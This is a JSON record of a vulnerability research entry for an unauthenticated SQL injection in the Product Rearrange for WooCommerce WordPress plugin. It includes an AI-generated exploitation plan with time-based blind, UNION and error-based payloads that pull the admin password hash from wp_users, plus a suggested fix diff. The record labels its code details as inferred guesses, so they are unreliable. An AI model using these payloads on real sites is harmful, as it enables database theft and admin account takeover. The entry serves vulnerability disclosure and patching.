[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fud5eLXflKWLJZH1Mie72Vy3-RNI0_aNV6GcSAJX0ZKo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-31920","product-rearrange-for-woocommerce-unauthenticated-sql-injection","Product Rearrange for WooCommerce \u003C= 1.2.2 - Unauthenticated SQL Injection","The Product Rearrange for WooCommerce plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","products-rearrange-woocommerce",null,"\u003C=1.2.2","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-20 00:00:00","2026-03-26 20:39:17",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fad32fdd9-d1b5-4591-851f-889a7e3db047?source=api-prod",[],"researched",false,3,"This research plan focuses on identifying and exploiting an unauthenticated SQL injection vulnerability in the **Product Rearrange for WooCommerce** plugin (versions \u003C= 1.2.2).\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin registers an AJAX handler for unauthenticated users (via `wp_ajax_nopriv_`) and uses user-supplied input directly in a SQL query without proper sanitization (like `absint()` or `sanitize_text_field()`) or parameterized preparation via `$wpdb->prepare()`. Specifically, parameters related to product categories or sorting order are likely concatenated into a `SELECT` or `UPDATE` query.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action:** To be determined via analysis (likely `prfw_sort_products`, `get_products_by_category`, or `save_rearranged_order`).\n* **Vulnerable Parameter:** Likely a parameter named `category_id`, `term_id`, or an array of `ids`.\n* **Authentication:** None (Unauthenticated). The plugin likely uses `add_action( 'wp_ajax_nopriv_...', ... )`.\n* **Preconditions:** WooCommerce must be installed and active, and the plugin must be configured (at least one product category should exist).\n\n### 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with an `action` parameter.\n2. **Hook Registration:** The plugin registers a handler:\n `add_action('wp_ajax_nopriv_[ACTION_NAME]', 'handler_function_name');`\n3. **Handler Function:** The function retrieves data from `$_POST` or `$_GET`.\n `$category = $_POST['category_id'];` (Vulnerable source)\n4. **Database Sink:** The input is concatenated into a raw SQL string.\n `$wpdb->get_results(\"SELECT ... WHERE term_id = $category\");` (Vulnerable sink)\n5. **Execution:** The query executes, allowing for UNION-based or Time-based injection.\n\n### 4. Nonce Acquisition Strategy\nWhile the vulnerability is unauthenticated, the AJAX handler might still check for a nonce. If it does, we must extract it.\n\n1. **Identify Nonce Action:** Search the plugin code for `check_ajax_referer` or `wp_verify_nonce` within the AJAX handler. Note the action string (e.g., `'prfw-nonce'`).\n2. **Identify Exposure:** Search for `wp_localize_script` to find where the nonce is passed to the frontend.\n3. **Create Trigger Page:** Most rearrangement plugins only load their scripts on the Shop page or a specific admin-like frontend page.\n * Command: `wp post create --post_type=page --post_status=publish --post_title=\"Sort Test\" --post_content='[products]'` (or the plugin's specific shortcode if found via `grep \"add_shortcode\"`).\n4. **Extract Nonce:**\n * Navigate to the newly created page using `browser_navigate`.\n * Use `browser_eval` to find the localization object.\n * Example: `browser_eval(\"window.prfw_obj?.nonce\")`.\n\n*Note: If `check_ajax_referer` is missing or called with `die=false` without a subsequent return check, the nonce is unnecessary.*\n\n### 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** payload, as it is the most reliable method for unauthenticated endpoints where output might not be directly reflected.\n\n* **Step 1: Discover Action and Parameter**\n * Grep for unauthenticated actions: `grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Fproducts-rearrange-woocommerce\u002F`\n * Locate the handler function and look for `$wpdb` calls.\n* **Step 2: Construct the Request**\n * **Method:** POST\n * **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n * **Content-Type:** `application\u002Fx-www-form-urlencoded`\n* **Step 3: Test for Injection (Sleep)**\n * **Payload:** `action=[ACTION]&[PARAM]=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n * **Execution Tool:** `http_request`\n* **Step 4: Data Extraction**\n * Target `wp_users` to extract the admin password hash.\n * **Payload (Bit-by-bit):** `1 AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))>64,SLEEP(5),0)`\n\n### 6. Test Data Setup\n1. **Install WooCommerce:** Ensure it is active.\n2. **Add Products:** Create at least two products and assign them to a category.\n * `wp product create --name=\"Test Product 1\" --status=\"publish\"`\n * `wp term create product_cat \"Test Category\"`\n * `wp term list product_cat --fields=term_id` (Note the ID)\n3. **Activate Plugin:** Ensure `products-rearrange-woocommerce` is active.\n\n### 7. Expected Results\n* **Vulnerability Confirmation:** A request containing the `SLEEP(5)` payload should result in a response delay of approximately 5 seconds compared to a baseline request.\n* **Data Exposure:** Using boolean-based time delays, the agent should be able to determine the character values of the administrator's password hash from the `wp_users` table.\n\n### 8. Verification Steps\nAfter the HTTP exploit, verify the extracted data matches the database state using WP-CLI:\n* **Command:** `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n* Compare the hash returned by the query with the one reconstructed via SQL injection.\n\n### 9. Alternative Approaches\n* **UNION-Based Injection:** If the AJAX handler returns product data (e.g., JSON list of products), try to inject `UNION SELECT` to leak the `user_pass` directly in the response body.\n * Identify the number of columns by injecting `ORDER BY 1, 2, 3...` until an error occurs.\n * Inject `UNION SELECT 1,2,user_pass,4... FROM wp_users WHERE ID=1-- -`.\n* **Error-Based Injection:** If `WP_DEBUG` is enabled on the target, inject `updatexml()` or `extractvalue()` to trigger a database error containing the desired data.\n * Payload: `1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)`","The Product Rearrange for WooCommerce plugin for WordPress is vulnerable to unauthenticated SQL Injection in versions up to and including 1.2.2. This vulnerability stems from the plugin's failure to sanitize user-supplied input before using it in raw SQL queries within AJAX handlers registered for unauthenticated users, allowing for the exfiltration of sensitive data.","\u002F\u002F Inferred from plugin registration logic\nadd_action('wp_ajax_nopriv_[ACTION_NAME]', 'handler_function_name');\n\n---\n\n\u002F\u002F Inferred from AJAX handler in products-rearrange-woocommerce.php\n$category = $_POST['category_id'];\n$wpdb->get_results(\"SELECT ... WHERE term_id = $category\");","--- a\u002Fproducts-rearrange-woocommerce.php\n+++ b\u002Fproducts-rearrange-woocommerce.php\n@@ -10,2 +10,2 @@\n-$category = $_POST['category_id'];\n-$wpdb->get_results(\"SELECT ... WHERE term_id = $category\");\n+$category = isset($_POST['category_id']) ? absint($_POST['category_id']) : 0;\n+$wpdb->get_results($wpdb->prepare(\"SELECT ... WHERE term_id = %d\", $category));","The exploit targets the WordPress AJAX endpoint at '\u002Fwp-admin\u002Fadmin-ajax.php' using an unauthenticated action (likely related to product sorting or category filtering). The attacker sends a POST request containing a malicious payload in a user-supplied parameter, such as 'category_id'. Since the input is not sanitized or passed through $wpdb->prepare(), the attacker can inject SQL commands. A typical payload uses time-based blind injection (e.g., '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)') to confirm the vulnerability and exfiltrate data character-by-character from the database based on the response time.","gemini-3-flash-preview","2026-04-18 01:36:04","2026-04-18 01:36:24",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproducts-rearrange-woocommerce\u002Ftags"]